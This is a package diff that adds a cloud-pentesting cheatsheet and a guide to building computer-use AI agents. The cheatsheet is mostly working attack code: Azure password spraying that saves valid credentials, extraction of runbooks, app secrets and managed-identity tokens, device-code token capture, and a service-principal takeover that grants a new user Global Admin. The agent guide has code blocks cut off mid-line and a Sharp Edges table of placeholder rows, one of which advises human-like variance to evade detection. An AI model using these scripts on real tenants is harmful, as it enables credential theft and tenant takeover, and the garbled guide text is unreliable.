@namch/agent-assistant 1.0.0 → 1.0.2

package/skills/cloud-penetration-testing/references/advanced-cloud-scripts.md

@@ -0,0 +1,318 @@
+# Advanced Cloud Pentesting Scripts
+
+Reference: [Cloud Pentesting Cheatsheet by Beau Bullock](https://github.com/dafthack/CloudPentestCheatsheets)
+
+## Azure Automation Runbooks
+
+### Export All Runbooks from All Subscriptions
+
+```powershell
+$subs = Get-AzSubscription
+Foreach($s in $subs){
+    $subscriptionid = $s.SubscriptionId
+    mkdir .\$subscriptionid\
+    Select-AzSubscription -Subscription $subscriptionid
+    $runbooks = @()
+    $autoaccounts = Get-AzAutomationAccount | Select-Object AutomationAccountName,ResourceGroupName
+    foreach ($i in $autoaccounts){
+        $runbooks += Get-AzAutomationRunbook -AutomationAccountName $i.AutomationAccountName -ResourceGroupName $i.ResourceGroupName | Select-Object AutomationAccountName,ResourceGroupName,Name
+    }
+    foreach($r in $runbooks){
+        Export-AzAutomationRunbook -AutomationAccountName $r.AutomationAccountName -ResourceGroupName $r.ResourceGroupName -Name $r.Name -OutputFolder .\$subscriptionid\
+    }
+}
+```
+
+### Export All Automation Job Outputs
+
+```powershell
+$subs = Get-AzSubscription
+$jobout = @()
+Foreach($s in $subs){
+    $subscriptionid = $s.SubscriptionId
+    Select-AzSubscription -Subscription $subscriptionid
+    $jobs = @()
+    $autoaccounts = Get-AzAutomationAccount | Select-Object AutomationAccountName,ResourceGroupName
+    foreach ($i in $autoaccounts){
+        $jobs += Get-AzAutomationJob $i.AutomationAccountName -ResourceGroupName $i.ResourceGroupName | Select-Object AutomationAccountName,ResourceGroupName,JobId
+    }
+    foreach($r in $jobs){
+        $jobout += Get-AzAutomationJobOutput -AutomationAccountName $r.AutomationAccountName -ResourceGroupName $r.ResourceGroupName -JobId $r.JobId
+    }
+}
+$jobout | Out-File -Encoding ascii joboutputs.txt
+```
+
+## Azure Function Apps
+
+### List All Function App Hostnames
+
+```powershell
+$functionapps = Get-AzFunctionApp
+foreach($f in $functionapps){
+    $f.EnabledHostname
+}
+```
+
+### Extract Function App Information
+
+```powershell
+$subs = Get-AzSubscription
+$allfunctioninfo = @()
+Foreach($s in $subs){
+    $subscriptionid = $s.SubscriptionId
+    Select-AzSubscription -Subscription $subscriptionid
+    $functionapps = Get-AzFunctionApp
+    foreach($f in $functionapps){
+        $allfunctioninfo += $f.config | Select-Object AcrUseManagedIdentityCred,AcrUserManagedIdentityId,AppCommandLine,ConnectionString,CorSupportCredentials,CustomActionParameter
+        $allfunctioninfo += $f.SiteConfig | fl
+        $allfunctioninfo += $f.ApplicationSettings | fl
+        $allfunctioninfo += $f.IdentityUserAssignedIdentity.Keys | fl
+    }
+}
+$allfunctioninfo
+```
+
+## Azure Device Code Login Flow
+
+### Initiate Device Code Login
+
+```powershell
+$body = @{
+    "client_id" = "1950a258-227b-4e31-a9cf-717495945fc2"
+    "resource"  = "https://graph.microsoft.com"
+}
+$UserAgent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
+$Headers = @{}
+$Headers["User-Agent"] = $UserAgent
+$authResponse = Invoke-RestMethod `
+    -UseBasicParsing `
+    -Method Post `
+    -Uri "https://login.microsoftonline.com/common/oauth2/devicecode?api-version=1.0" `
+    -Headers $Headers `
+    -Body $body
+$authResponse
+```
+
+Navigate to https://microsoft.com/devicelogin and enter the code.
+
+### Retrieve Access Tokens
+
+```powershell
+$body = @{
+    "client_id"  = "1950a258-227b-4e31-a9cf-717495945fc2"
+    "grant_type" = "urn:ietf:params:oauth:grant-type:device_code"
+    "code"       = $authResponse.device_code
+}
+$Tokens = Invoke-RestMethod `
+    -UseBasicParsing `
+    -Method Post `
+    -Uri "https://login.microsoftonline.com/Common/oauth2/token?api-version=1.0" `
+    -Headers $Headers `
+    -Body $body
+$Tokens
+```
+
+## Azure Managed Identity Token Retrieval
+
+```powershell
+# From Azure VM
+Invoke-WebRequest -Uri 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com' -Method GET -Headers @{Metadata="true"} -UseBasicParsing
+
+# Full instance metadata
+$instance = Invoke-WebRequest -Uri 'http://169.254.169.254/metadata/instance?api-version=2018-02-01' -Method GET -Headers @{Metadata="true"} -UseBasicParsing
+$instance
+```
+
+## AWS Region Iteration Scripts
+
+Create `regions.txt`:
+```
+us-east-1
+us-east-2
+us-west-1
+us-west-2
+ca-central-1
+eu-west-1
+eu-west-2
+eu-west-3
+eu-central-1
+eu-north-1
+ap-southeast-1
+ap-southeast-2
+ap-south-1
+ap-northeast-1
+ap-northeast-2
+ap-northeast-3
+sa-east-1
+```
+
+### List All EC2 Public IPs
+
+```bash
+while read r; do
+    aws ec2 describe-instances --query=Reservations[].Instances[].PublicIpAddress --region $r | jq -r '.[]' >> ec2-public-ips.txt
+done < regions.txt
+sort -u ec2-public-ips.txt -o ec2-public-ips.txt
+```
+
+### List All ELB DNS Addresses
+
+```bash
+while read r; do
+    aws elbv2 describe-load-balancers --query LoadBalancers[*].DNSName --region $r | jq -r '.[]' >> elb-public-dns.txt
+    aws elb describe-load-balancers --query LoadBalancerDescriptions[*].DNSName --region $r | jq -r '.[]' >> elb-public-dns.txt
+done < regions.txt
+sort -u elb-public-dns.txt -o elb-public-dns.txt
+```
+
+### List All RDS DNS Addresses
+
+```bash
+while read r; do
+    aws rds describe-db-instances --query=DBInstances[*].Endpoint.Address --region $r | jq -r '.[]' >> rds-public-dns.txt
+done < regions.txt
+sort -u rds-public-dns.txt -o rds-public-dns.txt
+```
+
+### Get CloudFormation Outputs
+
+```bash
+while read r; do
+    aws cloudformation describe-stacks --query 'Stacks[*].[StackName, Description, Parameters, Outputs]' --region $r | jq -r '.[]' >> cloudformation-outputs.txt
+done < regions.txt
+```
+
+## ScoutSuite jq Parsing Queries
+
+### AWS Queries
+
+```bash
+# Find All Lambda Environment Variables
+for d in */ ; do
+    tail $d/scoutsuite-results/scoutsuite_results*.js -n +2 | jq '.services.awslambda.regions[].functions[] | select (.env_variables != []) | .arn, .env_variables' >> lambda-all-environment-variables.txt
+done
+
+# Find World Listable S3 Buckets
+for d in */ ; do
+    tail $d/scoutsuite-results/scoutsuite_results*.js -n +2 | jq '.account_id, .services.s3.findings."s3-bucket-AuthenticatedUsers-read".items[]' >> s3-buckets-world-listable.txt
+done
+
+# Find All EC2 User Data
+for d in */ ; do
+    tail $d/scoutsuite-results/scoutsuite_results*.js -n +2 | jq '.services.ec2.regions[].vpcs[].instances[] | select (.user_data != null) | .arn, .user_data' >> ec2-instance-all-user-data.txt
+done
+
+# Find EC2 Security Groups That Whitelist AWS CIDRs
+for d in */ ; do
+    tail $d/scoutsuite-results/scoutsuite_results*.js -n +2 | jq '.account_id' >> ec2-security-group-whitelists-aws-cidrs.txt
+    tail $d/scoutsuite-results/scoutsuite_results*.js -n +2 | jq '.services.ec2.findings."ec2-security-group-whitelists-aws".items' >> ec2-security-group-whitelists-aws-cidrs.txt
+done
+
+# Find All EC2 EBS Volumes Unencrypted
+for d in */ ; do
+    tail $d/scoutsuite-results/scoutsuite_results*.js -n +2 | jq '.services.ec2.regions[].volumes[] | select(.Encrypted == false) | .arn' >> ec2-ebs-volume-not-encrypted.txt
+done
+
+# Find All EC2 EBS Snapshots Unencrypted
+for d in */ ; do
+    tail $d/scoutsuite-results/scoutsuite_results*.js -n +2 | jq '.services.ec2.regions[].snapshots[] | select(.encrypted == false) | .arn' >> ec2-ebs-snapshot-not-encrypted.txt
+done
+```
+
+### Azure Queries
+
+```bash
+# List All Azure App Service Host Names
+tail scoutsuite_results_azure-tenant-*.js -n +2 | jq -r '.services.appservice.subscriptions[].web_apps[].host_names[]'
+
+# List All Azure SQL Servers
+tail scoutsuite_results_azure-tenant-*.js -n +2 | jq -jr '.services.sqldatabase.subscriptions[].servers[] | .name,".database.windows.net","\n"'
+
+# List All Azure Virtual Machine Hostnames
+tail scoutsuite_results_azure-tenant-*.js -n +2 | jq -jr '.services.virtualmachines.subscriptions[].instances[] | .name,".",.location,".cloudapp.windows.net","\n"'
+
+# List Storage Accounts
+tail scoutsuite_results_azure-tenant-*.js -n +2 | jq -r '.services.storageaccounts.subscriptions[].storage_accounts[] | .name'
+
+# List Disks Encrypted with Platform Managed Keys
+tail scoutsuite_results_azure-tenant-*.js -n +2 | jq '.services.virtualmachines.subscriptions[].disks[] | select(.encryption_type = "EncryptionAtRestWithPlatformKey") | .name' > disks-with-pmks.txt
+```
+
+## Password Spraying with Az PowerShell
+
+```powershell
+$userlist = Get-Content userlist.txt
+$passlist = Get-Content passlist.txt
+$linenumber = 0
+$count = $userlist.count
+foreach($line in $userlist){
+    $user = $line
+    $pass = ConvertTo-SecureString $passlist[$linenumber] -AsPlainText -Force
+    $current = $linenumber + 1
+    Write-Host -NoNewline ("`r[" + $current + "/" + $count + "]" + "Trying: " + $user + " and " + $passlist[$linenumber])
+    $linenumber++
+    $Cred = New-Object System.Management.Automation.PSCredential ($user, $pass)
+    try {
+        Connect-AzAccount -Credential $Cred -ErrorAction Stop -WarningAction SilentlyContinue
+        Add-Content valid-creds.txt ($user + "|" + $passlist[$linenumber - 1])
+        Write-Host -ForegroundColor green ("`nGot something here: $user and " + $passlist[$linenumber - 1])
+    }
+    catch {
+        $Failure = $_.Exception
+        if ($Failure -match "ID3242") { continue }
+        else {
+            Write-Host -ForegroundColor green ("`nGot something here: $user and " + $passlist[$linenumber - 1])
+            Add-Content valid-creds.txt ($user + "|" + $passlist[$linenumber - 1])
+            Add-Content valid-creds.txt $Failure.Message
+            Write-Host -ForegroundColor red $Failure.Message
+        }
+    }
+}
+```
+
+## Service Principal Attack Path
+
+```bash
+# Reset service principal credential
+az ad sp credential reset --id <app_id>
+az ad sp credential list --id <app_id>
+
+# Login as service principal
+az login --service-principal -u "app id" -p "password" --tenant <tenant ID> --allow-no-subscriptions
+
+# Create new user in tenant
+az ad user create --display-name <name> --password <password> --user-principal-name <upn>
+
+# Add user to Global Admin via MS Graph
+$Body="{'principalId':'User Object ID', 'roleDefinitionId': '62e90394-69f5-4237-9190-012177145e10', 'directoryScopeId': '/'}"
+az rest --method POST --uri https://graph.microsoft.com/v1.0/roleManagement/directory/roleAssignments --headers "Content-Type=application/json" --body $Body
+```
+
+## Additional Tools Reference
+
+| Tool | URL | Purpose |
+|------|-----|---------|
+| MicroBurst | github.com/NetSPI/MicroBurst | Azure security assessment |
+| PowerZure | github.com/hausec/PowerZure | Azure post-exploitation |
+| ROADTools | github.com/dirkjanm/ROADtools | Azure AD enumeration |
+| Stormspotter | github.com/Azure/Stormspotter | Azure attack path graphing |
+| MSOLSpray | github.com/dafthack | O365 password spraying |
+| AzureHound | github.com/BloodHoundAD/AzureHound | Azure AD attack paths |
+| WeirdAAL | github.com/carnal0wnage/weirdAAL | AWS enumeration |
+| Pacu | github.com/RhinoSecurityLabs/pacu | AWS exploitation |
+| ScoutSuite | github.com/nccgroup/ScoutSuite | Multi-cloud auditing |
+| cloud_enum | github.com/initstring/cloud_enum | Public resource discovery |
+| GitLeaks | github.com/zricethezav/gitleaks | Secret scanning |
+| TruffleHog | github.com/dxa4481/truffleHog | Git secret scanning |
+| ip2Provider | github.com/oldrho/ip2provider | Cloud IP identification |
+| FireProx | github.com/ustayready/fireprox | IP rotation via AWS API Gateway |
+
+## Vulnerable Training Environments
+
+| Platform | URL | Purpose |
+|----------|-----|---------|
+| CloudGoat | github.com/RhinoSecurityLabs/cloudgoat | AWS vulnerable lab |
+| SadCloud | github.com/nccgroup/sadcloud | Terraform misconfigs |
+| Flaws Cloud | flaws.cloud | AWS CTF challenges |
+| Thunder CTF | thunder-ctf.cloud | GCP CTF challenges |

package/skills/computer-use-agents/SKILL.md

@@ -0,0 +1,315 @@
+---
+name: computer-use-agents
+description: "Build AI agents that interact with computers like humans do - viewing screens, moving cursors, clicking buttons, and typing text. Covers Anthropic's Computer Use, OpenAI's Operator/CUA, and open-source alternatives. Critical focus on sandboxing, security, and handling the unique challenges of vision-based control. Use when: computer use, desktop automation agent, screen control AI, vision-based agent, GUI automation."
+source: vibeship-spawner-skills (Apache 2.0)
+---
+
+# Computer Use Agents
+
+## Patterns
+
+### Perception-Reasoning-Action Loop
+
+The fundamental architecture of computer use agents: observe screen,
+reason about next action, execute action, repeat. This loop integrates
+vision models with action execution through an iterative pipeline.
+
+Key components:
+1. PERCEPTION: Screenshot captures current screen state
+2. REASONING: Vision-language model analyzes and plans
+3. ACTION: Execute mouse/keyboard operations
+4. FEEDBACK: Observe result, continue or correct
+
+Critical insight: Vision agents are completely still during "thinking"
+phase (1-5 seconds), creating a detectable pause pattern.
+
+
+**When to use**: ['Building any computer use agent from scratch', 'Integrating vision models with desktop control', 'Understanding agent behavior patterns']
+
+```python
+from anthropic import Anthropic
+from PIL import Image
+import base64
+import pyautogui
+import time
+
+class ComputerUseAgent:
+    """
+    Perception-Reasoning-Action loop implementation.
+    Based on Anthropic Computer Use patterns.
+    """
+
+    def __init__(self, client: Anthropic, model: str = "claude-sonnet-4-20250514"):
+        self.client = client
+        self.model = model
+        self.max_steps = 50  # Prevent runaway loops
+        self.action_delay = 0.5  # Seconds between actions
+
+    def capture_screenshot(self) -> str:
+        """Capture screen and return base64 encoded image."""
+        screenshot = pyautogui.screenshot()
+        # Resize for token efficiency (1280x800 is good balance)
+        screenshot = screenshot.resize((1280, 800), Image.LANCZOS)
+
+        import io
+        buffer = io.BytesIO()
+        screenshot.save(buffer, format="PNG")
+        return base64.b64encode(buffer.getvalue()).decode()
+
+    def execute_action(self, action: dict) -> dict:
+        """Execute mouse/keyboard action on the computer."""
+        action_type = action.get("type")
+
+        if action_type == "click":
+            x, y = action["x"], action["y"]
+            button = action.get("button", "left")
+            pyautogui.click(x, y, button=button)
+            return {"success": True, "action": f"clicked at ({x}, {y})"}
+
+        elif action_type == "type":
+            text = action["text"]
+            pyautogui.typewrite(text, interval=0.02)
+            return {"success": True, "action": f"typed {len(text)} chars"}
+
+        elif action_type == "key":
+            key = action["key"]
+            pyautogui.press(key)
+            return {"success": True, "action": f"pressed {key}"}
+
+        elif action_type == "scroll":
+            direction = action.get("direction", "down")
+            amount = action.get("amount", 3)
+            scroll = -amount if direction == "down" else amount
+            pyautogui.scroll(scroll)
+            return {"success": True, "action": f"scrolled {dir
+```
+
+### Sandboxed Environment Pattern
+
+Computer use agents MUST run in isolated, sandboxed environments.
+Never give agents direct access to your main system - the security
+risks are too high. Use Docker containers with virtual desktops.
+
+Key isolation requirements:
+1. NETWORK: Restrict to necessary endpoints only
+2. FILESYSTEM: Read-only or scoped to temp directories
+3. CREDENTIALS: No access to host credentials
+4. SYSCALLS: Filter dangerous system calls
+5. RESOURCES: Limit CPU, memory, time
+
+The goal is "blast radius minimization" - if the agent goes wrong,
+damage is contained to the sandbox.
+
+
+**When to use**: ['Deploying any computer use agent', 'Testing agent behavior safely', 'Running untrusted automation tasks']
+
+```python
+# Dockerfile for sandboxed computer use environment
+# Based on Anthropic's reference implementation pattern
+
+FROM ubuntu:22.04
+
+# Install desktop environment
+RUN apt-get update && apt-get install -y \
+    xvfb \
+    x11vnc \
+    fluxbox \
+    xterm \
+    firefox \
+    python3 \
+    python3-pip \
+    supervisor
+
+# Security: Create non-root user
+RUN useradd -m -s /bin/bash agent && \
+    mkdir -p /home/agent/.vnc
+
+# Install Python dependencies
+COPY requirements.txt /tmp/
+RUN pip3 install -r /tmp/requirements.txt
+
+# Security: Drop capabilities
+RUN apt-get install -y --no-install-recommends libcap2-bin && \
+    setcap -r /usr/bin/python3 || true
+
+# Copy agent code
+COPY --chown=agent:agent . /app
+WORKDIR /app
+
+# Supervisor config for virtual display + VNC
+COPY supervisord.conf /etc/supervisor/conf.d/
+
+# Expose VNC port only (not desktop directly)
+EXPOSE 5900
+
+# Run as non-root
+USER agent
+
+CMD ["/usr/bin/supervisord", "-c", "/etc/supervisor/conf.d/supervisord.conf"]
+
+---
+
+# docker-compose.yml with security constraints
+version: '3.8'
+
+services:
+  computer-use-agent:
+    build: .
+    ports:
+      - "5900:5900"  # VNC for observation
+      - "8080:8080"  # API for control
+
+    # Security constraints
+    security_opt:
+      - no-new-privileges:true
+      - seccomp:seccomp-profile.json
+
+    # Resource limits
+    deploy:
+      resources:
+        limits:
+          cpus: '2'
+          memory: 4G
+        reservations:
+          cpus: '0.5'
+          memory: 1G
+
+    # Network isolation
+    networks:
+      - agent-network
+
+    # No access to host filesystem
+    volumes:
+      - agent-tmp:/tmp
+
+    # Read-only root filesystem
+    read_only: true
+    tmpfs:
+      - /run
+      - /var/run
+
+    # Environment
+    environment:
+      - DISPLAY=:99
+      - NO_PROXY=localhost
+
+networks:
+  agent-network:
+    driver: bridge
+    internal: true  # No internet by default
+
+volumes:
+  agent-tmp:
+
+---
+
+# Python wrapper with additional runtime sandboxing
+import subprocess
+import os
+from dataclasses im
+```
+
+### Anthropic Computer Use Implementation
+
+Official implementation pattern using Claude's computer use capability.
+Claude 3.5 Sonnet was the first frontier model to offer computer use.
+Claude Opus 4.5 is now the "best model in the world for computer use."
+
+Key capabilities:
+- screenshot: Capture current screen state
+- mouse: Click, move, drag operations
+- keyboard: Type text, press keys
+- bash: Run shell commands
+- text_editor: View and edit files
+
+Tool versions:
+- computer_20251124 (Opus 4.5): Adds zoom action for detailed inspection
+- computer_20250124 (All other models): Standard capabilities
+
+Critical limitation: "Some UI elements (like dropdowns and scrollbars)
+might be tricky for Claude to manipulate" - Anthropic docs
+
+
+**When to use**: ['Building production computer use agents', 'Need highest quality vision understanding', 'Full desktop control (not just browser)']
+
+```python
+from anthropic import Anthropic
+from anthropic.types.beta import (
+    BetaToolComputerUse20241022,
+    BetaToolBash20241022,
+    BetaToolTextEditor20241022,
+)
+import subprocess
+import base64
+from PIL import Image
+import io
+
+class AnthropicComputerUse:
+    """
+    Official Anthropic Computer Use implementation.
+
+    Requires:
+    - Docker container with virtual display
+    - VNC for viewing agent actions
+    - Proper tool implementations
+    """
+
+    def __init__(self):
+        self.client = Anthropic()
+        self.model = "claude-sonnet-4-20250514"  # Best for computer use
+        self.screen_size = (1280, 800)
+
+    def get_tools(self) -> list:
+        """Define computer use tools."""
+        return [
+            BetaToolComputerUse20241022(
+                type="computer_20241022",
+                name="computer",
+                display_width_px=self.screen_size[0],
+                display_height_px=self.screen_size[1],
+            ),
+            BetaToolBash20241022(
+                type="bash_20241022",
+                name="bash",
+            ),
+            BetaToolTextEditor20241022(
+                type="text_editor_20241022",
+                name="str_replace_editor",
+            ),
+        ]
+
+    def execute_tool(self, name: str, input: dict) -> dict:
+        """Execute a tool and return result."""
+
+        if name == "computer":
+            return self._handle_computer_action(input)
+        elif name == "bash":
+            return self._handle_bash(input)
+        elif name == "str_replace_editor":
+            return self._handle_editor(input)
+        else:
+            return {"error": f"Unknown tool: {name}"}
+
+    def _handle_computer_action(self, input: dict) -> dict:
+        """Handle computer control actions."""
+        action = input.get("action")
+
+        if action == "screenshot":
+            # Capture via xdotool/scrot
+            subprocess.run(["scrot", "/tmp/screenshot.png"])
+
+            with open("/tmp/screenshot.png", "rb") as f:
+            
+```
+
+## ⚠️ Sharp Edges
+
+| Issue | Severity | Solution |
+|-------|----------|----------|
+| Issue | critical | ## Defense in depth - no single solution works |
+| Issue | medium | ## Add human-like variance to actions |
+| Issue | high | ## Use keyboard alternatives when possible |
+| Issue | medium | ## Accept the tradeoff |
+| Issue | high | ## Implement context management |
+| Issue | high | ## Monitor and limit costs |
+| Issue | critical | ## ALWAYS use sandboxing |